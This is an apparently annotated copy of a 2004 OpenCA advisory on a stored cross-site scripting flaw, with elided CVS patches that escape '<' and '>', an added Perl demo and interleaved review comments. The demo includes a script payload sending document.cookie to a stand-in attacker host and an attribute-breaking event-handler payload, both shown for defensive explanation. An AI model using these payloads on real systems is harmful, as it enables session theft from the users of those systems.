OpenCA Security Advisory: Cross Site Scripting vulnerability

Martin Bartosch <mb-bugtraq@cynops.de>
Michael Bell <michael.bell@cms.hu-berlin.de>

2004-09-01 Initial revision
2004-09-06 Public release
The OpenCA Project is a collaborative effort to develop a robust,
full-featured, Open Source, out-of-the-box Certification Authority that
implements the most widely used protocols with full-strength
cryptography. OpenCA builds on many other Open Source projects, among
them OpenLDAP, OpenSSL, the Apache HTTP Server and Apache mod_ssl.
A Cross Site Scripting (XSS) vulnerability was found in the OpenCA PKI
software. Users of the system can inject malicious HTML code into data
that the system stores and later displays to other users. The malicious
code may even affect offline
All versions of OpenCA, including 0.9.1-8 and 0.9.2 RC6.
Form input to the web frontends is neither validated nor escaped before
it is stored and displayed again, so a user can inject malicious HTML
code into the system. This is a stored (persistent) XSS: once the
offending code has been accepted into the system, it is rendered, and
executed, by the browser of any PKI staff member or other user who later
views that data.
OpenCA advocates separating the individual frontends and running the
CA and RA offline. In that setup data is exchanged on a removable medium
such as a floppy disk. Offending code embedded in the user data travels
along with it and may therefore reach systems that are not connected to
any network at all, where it can be used to attack the offline nodes.
Cross site scripting attacks primarily affect the client system running
the browser that displays the web page; OpenCA itself is not directly
affected. However, XSS exploit code may be deployed, for example, to
obtain the victim's session credentials and take over that session.
More advanced attacks (requiring specially crafted exploit code) could
even be targeted at manipulating data on the OpenCA node on the user's
behalf, with the privileges of the staff member whose browser runs the
code.
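The stored XSS path described above, and the session-cookie theft it enables, as an added example in Perl (OpenCA's implementation language). This is illustrative code written for this page, not OpenCA's own; the form field names, the payload, the in-memory "stored" request and the helper names (render_row_unsafe, render_row_safe, html_escape, sanitize_params, has_script_tag) are all constructed. sanitize_params models the input-side rewrite of '<' and '>' that the patches appended to this advisory perform, so the double-encoding and attribute-context caveats of that approach can be seen next to output-side escaping:

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Constructed sample request as the public frontend might receive it. The
# field names are hypothetical, not OpenCA's actual form parameters, and the
# CN carries a script that sends the viewer's cookie to an attacker host.
my %submitted = (
    cn    => 'Alice <script>new Image().src="http://attacker.invalid/?"+document.cookie</script>',
    email => 'alice@example.com',
);

# Vulnerable pattern (what the advisory describes): a stored field is
# interpolated into the RA operator's page unchanged, so the script runs in
# the operator's browser when the request is opened for review.
sub render_row_unsafe {
    my ($label, $value) = @_;
    return "<tr><td>$label</td><td>$value</td></tr>\n";
}

# Output-side fix: escape every HTML-significant character at the point
# where untrusted data enters a text node or attribute value. The stored
# data stays exactly as the user entered it.
sub html_escape {
    my ($s) = @_;
    my %ent = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
               '"' => '&quot;', "'" => '&#39;');
    $s =~ s/([&<>"'])/$ent{$1}/g;
    return $s;
}

sub render_row_safe {
    my ($label, $value) = @_;
    return "<tr><td>" . html_escape($label) . "</td><td>"
         . html_escape($value) . "</td></tr>\n";
}

# Input-side approach modelled on the advisory's patch: rewrite '<' and '>'
# in every CGI parameter once, when the request is parsed.
sub sanitize_params {
    my ($params) = @_;
    for my $name (keys %$params) {
        $params->{$name} =~ s/</&lt;/g;
        $params->{$name} =~ s/>/&gt;/g;
    }
    return $params;
}

# Does the rendered HTML still contain markup a browser would execute?
sub has_script_tag { return $_[0] =~ /<script/i ? 1 : 0 }

# 1. Unpatched: the payload reaches the browser as markup.
my $page = render_row_unsafe('CN', $submitted{cn});
printf "unpatched render             : script tag present = %d\n", has_script_tag($page);

# 2. Output escaping: the browser shows the payload as harmless text.
$page = render_row_safe('CN', $submitted{cn});
printf "output escaping              : script tag present = %d\n", has_script_tag($page);

# 3. Input rewriting (the patch): also neutralised, but the stored value now
#    contains '&lt;' and '&gt;'. A certificate subject built from it would
#    carry the entities (the patch's own FIXME), and escaping it again on
#    output shows the operator a literal "&lt;script&gt;" (double encoding).
my %stored = %submitted;
sanitize_params(\%stored);
printf "input rewriting, stored CN   : %s\n", $stored{cn};
printf "input rewriting, escaped out : %s\n", html_escape($stored{cn});

# 4. Caveat: rewriting only '<' and '>' does nothing for a value that is
#    later placed inside an attribute. The quote ends the attribute and the
#    event handler still runs; context-aware output escaping covers it.
my %attr_attack = (cn => 'Alice" onmouseover="alert(document.cookie)');
sanitize_params(\%attr_attack);
printf "attribute context, rewritten : %s\n",
       qq{<input name="cn" value="$attr_attack{cn}">};
printf "attribute context, escaped   : %s\n",
       qq{<input name="cn" value="} . html_escape($attr_attack{cn}) . qq{">};
```

Run it with perl; it prints the four cases. The point a practitioner should take from the last two: rewriting two characters at input time stops the tag-based payload and is a reasonable emergency fix, but the stored value is no longer what the user entered (hence the patch's FIXME about certificate generation), and a payload that needs only quotes survives when the value is reflected into an attribute. Escaping at output, for the context the value is placed into, handles both.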
All users of OpenCA should upgrade to a version that is not affected

OpenCA version 0.9.1 users are encouraged to upgrade to version 0.9.1-9.
Users of the current development branch 0.9.2 should upgrade to CVS
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2004-0787 to this issue.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0787

URL for this Security Advisory:
http://www.openca.org/news/CAN-2004-0787.txt
###########################################################################
## Patches against version 0.9.2
###########################################################################
92 Index: src/common/lib/functions/initServer
93 ===================================================================
94 RCS file: /cvsroot/openca/openca-0.9/src/common/lib/functions/initServer,v
95 retrieving revision 1.40
96 diff -u -r1.40 initServer
97 --- src/common/lib/functions/initServer 30 Aug 2004 12:31:53 -0000 1.40
98 +++ src/common/lib/functions/initServer 1 Sep 2004 13:27:27 -0000
100 $query->set_gettext (\&i18nGettext);
103 + ## validate input data
104 + ## 2004-08-27 Martin Bartosch <m.bartosch@cynops.de>
105 + validateCGIParameters(\$query);
107 ## reinit configuration
108 my $CONFIG = $AUTOCONF {"etc_prefix"}.'/servers/'.$AUTOCONF {"config_prefix"}.'.conf';
109 if( not defined (my $ret = $config->loadCfg( "$CONFIG" )) ) {
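Review bot: validateCGIParameters(\$query) is called here unconditionally, right after set_gettext, but the function is defined in misc-utils.lib; make sure that library is loaded before initServer runs, otherwise the frontend dies with an undefined subroutine at request time. A one-line comment at this call site that every CGI parameter has had '<' and '>' replaced from here on would also help: any code path that feeds parameter values into certificate, LDAP or database fields now receives entity text rather than the raw input, which is the FIXME the function itself carries.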
110 Index: src/common/lib/functions/misc-utils.lib
111 ===================================================================
112 RCS file: /cvsroot/openca/openca-0.9/src/common/lib/functions/misc-utils.lib,v
113 retrieving revision 1.50
114 diff -u -r1.50 misc-utils.lib
115 --- src/common/lib/functions/misc-utils.lib 26 Aug 2004 14:08:03 -0000 1.50
116 +++ src/common/lib/functions/misc-utils.lib 1 Sep 2004 13:27:27 -0000
121 +# 2004-08-31 Martin Bartosch <m.bartosch@cynops.de>
122 +# clean up CGI parameters
123 +# input: reference to CGI class instance
124 +# This function modifies the object itself
125 +sub validateCGIParameters {
126 + my $queryref = shift;
128 + ## validate input data
129 + ## 2004-08-27 Martin Bartosch <m.bartosch@cynops.de>
130 + foreach my $param (keys %{$$queryref->Vars}) {
131 + my @values = $$queryref->param($param);
133 + # replace < and > with < and &rt; for all CGI parameters passed
134 + # NOTE/FIXME: unescaping might be necessary when actually
135 + # passing this data to e. g. certificate generation routines
136 + # to prevent literal XML entities in certificate contents
141 + $$queryref->param(-name => $param, -value => @values);
143 + # extra sanity check just to be sure (redundant)
144 + foreach (@values) {
146 + print "Content-type: text/html\n\n";
147 + print "Security violation\n";
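Review bot: the comment at line 133 says '<' and '>' are replaced with '<' and '&rt;'; '&rt;' is not an HTML entity (the one for '>' is '&gt;'), so check that the substitution itself, which is not shown in this excerpt, emits '&gt;', and fix the comment either way. On the approach: rewriting only '<' and '>' neutralises tag injection but leaves '"', "'" and '&' untouched, so a value that is reflected inside an attribute value (a form field pre-filled with the submitted data, say) can still close the attribute and attach an event handler, and because the rewrite happens on input, any later output escaping double-encodes ('&lt;' becomes '&amp;lt;'). Escaping at the point of output, for the HTML context the value lands in, avoids both and makes the FIXME about unescaping before certificate generation unnecessary. Finally, the "Security violation" branch prints its own Content-type header; confirm nothing earlier in the request has already sent headers, or the message ends up inside the page body.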
###########################################################################
## Patches against version 0.9.1-8
###########################################################################
166 Index: src/common/lib/functions/misc-utils.lib
167 ===================================================================
168 RCS file: /cvsroot/openca/openca-0.9/src/common/lib/functions/misc-utils.lib,v
169 retrieving revision 1.16.2.2
170 diff -u -r1.16.2.2 misc-utils.lib
171 --- src/common/lib/functions/misc-utils.lib 16 Apr 2003 13:24:51 -0000 1.16.2.2
172 +++ src/common/lib/functions/misc-utils.lib 1 Sep 2004 11:49:14 -0000
177 +# 2004-08-31 Martin Bartosch <m.bartosch@cynops.de>
178 +# clean up CGI parameters
179 +# input: reference to CGI class instance
180 +# This function modifies the object itself
181 +sub validateCGIParameters {
182 + my $queryref = shift;
184 + ## validate input data
185 + ## 2004-08-27 Martin Bartosch <m.bartosch@cynops.de>
186 + foreach my $param (keys %{$$queryref->Vars}) {
187 + my @values = $$queryref->param($param);
189 + # replace < and > with < and &rt; for all CGI parameters passed
190 + # NOTE/FIXME: unescaping might be necessary when actually
191 + # passing this data to e. g. certificate generation routines
192 + # to prevent literal XML entities in certificate contents
197 + $$queryref->param(-name => $param, -value => @values);
199 + # extra sanity check just to be sure (redundant)
200 + foreach (@values) {
202 + print "Content-type: text/html\n\n";
203 + print "Security violation\n";
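Review bot: this is a verbatim copy of the 0.9.2 function, including the '&rt;' typo in the comment at line 189 and the input-side rewrite of only '<' and '>', so the same comments apply; the duplicated body also means any follow-up fix (the '&gt;' entity, attribute-context escaping, the FIXME on unescaping) has to be made in both branches.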
212 Index: src/web-interfaces/ca/ca.in
213 ===================================================================
214 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/ca/ca.in,v
215 retrieving revision 1.8.2.1
216 diff -u -r1.8.2.1 ca.in
217 --- src/web-interfaces/ca/ca.in 10 Nov 2003 13:10:48 -0000 1.8.2.1
218 +++ src/web-interfaces/ca/ca.in 1 Sep 2004 11:49:16 -0000
220 ##// Now it's time to get the parameters passed over the web
221 $query = new OpenCA::TRIStateCGI;
223 +## validate input parameters
224 +validateCGIParameters(\$query);
226 ## Generate a new reference to Configuration ( instance )
227 $dbconfig = new OpenCA::Configuration;
228 $dbiconfig = new OpenCA::Configuration;
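Review bot: in the 0.9.1 branch the call is inserted per frontend immediately after the OpenCA::TRIStateCGI object is created, before the configuration objects below are set up, so the "Security violation" path in validateCGIParameters can only emit its hard-coded plain message; acceptable for an error page, but worth noting. The larger concern with this per-frontend approach is coverage: any frontend script not in this patch set keeps unfiltered parameters, whereas the 0.9.2 patch's single call in initServer covers every frontend that goes through it.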
229 Index: src/web-interfaces/ldap/ldap.in
230 ===================================================================
231 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/ldap/ldap.in,v
232 retrieving revision 1.7.2.1
233 diff -u -r1.7.2.1 ldap.in
234 --- src/web-interfaces/ldap/ldap.in 10 Nov 2003 13:10:48 -0000 1.7.2.1
235 +++ src/web-interfaces/ldap/ldap.in 1 Sep 2004 11:49:16 -0000
237 ##// Now it's time to get the parameters passed over the web
238 $query = new OpenCA::TRIStateCGI;
240 +## validate input parameters
241 +validateCGIParameters(\$query);
243 ## Generate a new reference to Configuration ( instance )
244 $dbconfig = new OpenCA::Configuration;
245 $dbiconfig = new OpenCA::Configuration;
246 Index: src/web-interfaces/node/node.in
247 ===================================================================
248 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/node/node.in,v
249 retrieving revision 1.2.2.1
250 diff -u -r1.2.2.1 node.in
251 --- src/web-interfaces/node/node.in 10 Nov 2003 13:10:48 -0000 1.2.2.1
252 +++ src/web-interfaces/node/node.in 1 Sep 2004 11:49:17 -0000
254 ##// Now it's time to get the parameters passed over the web
255 $query = new OpenCA::TRIStateCGI;
257 +## validate input parameters
258 +validateCGIParameters(\$query);
260 ## Generate a new reference to Configuration ( instance )
261 $dbconfig = new OpenCA::Configuration;
262 $dbiconfig = new OpenCA::Configuration;
263 Index: src/web-interfaces/pub/pki.in
264 ===================================================================
265 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/pub/pki.in,v
266 retrieving revision 1.7.2.1
267 diff -u -r1.7.2.1 pki.in
268 --- src/web-interfaces/pub/pki.in 10 Nov 2003 13:10:48 -0000 1.7.2.1
269 +++ src/web-interfaces/pub/pki.in 1 Sep 2004 11:49:17 -0000
271 ##// Now it's time to get the parameters passed over the web
272 $query = new OpenCA::TRIStateCGI;
274 +## validate input parameters
275 +validateCGIParameters(\$query);
277 ## Generate a new reference to Configuration ( instance )
278 $dbconfig = new OpenCA::Configuration;
279 $dbiconfig = new OpenCA::Configuration;
280 Index: src/web-interfaces/pub/scepd.in
281 ===================================================================
282 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/pub/Attic/scepd.in,v
283 retrieving revision 1.2.2.1
284 diff -u -r1.2.2.1 scepd.in
285 --- src/web-interfaces/pub/scepd.in 10 Nov 2003 13:10:48 -0000 1.2.2.1
286 +++ src/web-interfaces/pub/scepd.in 1 Sep 2004 11:49:17 -0000
288 ##// Now it's time to get the parameters passed over the web
289 $query = new OpenCA::TRIStateCGI;
291 +## validate input parameters
292 +validateCGIParameters(\$query);
294 ## Generate a new reference to Configuration ( instance )
295 $dbconfig = new OpenCA::Configuration;
296 $dbiconfig = new OpenCA::Configuration;
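Review bot: scepd.in serves SCEP clients, not browsers, so the "Security violation" branch of validateCGIParameters would answer an SCEP request with a text/html page. The rewrite itself should be harmless for the base64-encoded PKCS#7 message SCEP passes as a parameter (its alphabet has no '<' or '>'), but confirm that no parameter scepd parses can legitimately contain those characters, and consider whether this endpoint needs the check at all given the file is already in Attic.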
297 Index: src/web-interfaces/ra/RAServer.in
298 ===================================================================
299 RCS file: /cvsroot/openca/openca-0.9/src/web-interfaces/ra/RAServer.in,v
300 retrieving revision 1.8.2.1
301 diff -u -r1.8.2.1 RAServer.in
302 --- src/web-interfaces/ra/RAServer.in 10 Nov 2003 13:10:49 -0000 1.8.2.1
303 +++ src/web-interfaces/ra/RAServer.in 1 Sep 2004 11:49:18 -0000
305 ##// Now it's time to get the parameters passed over the web
306 $query = new OpenCA::TRIStateCGI;
308 +## validate input parameters
309 +validateCGIParameters(\$query);
311 ## Generate a new reference to Configuration ( instance )
312 $dbconfig = new OpenCA::Configuration;
313 $dbiconfig = new OpenCA::Configuration;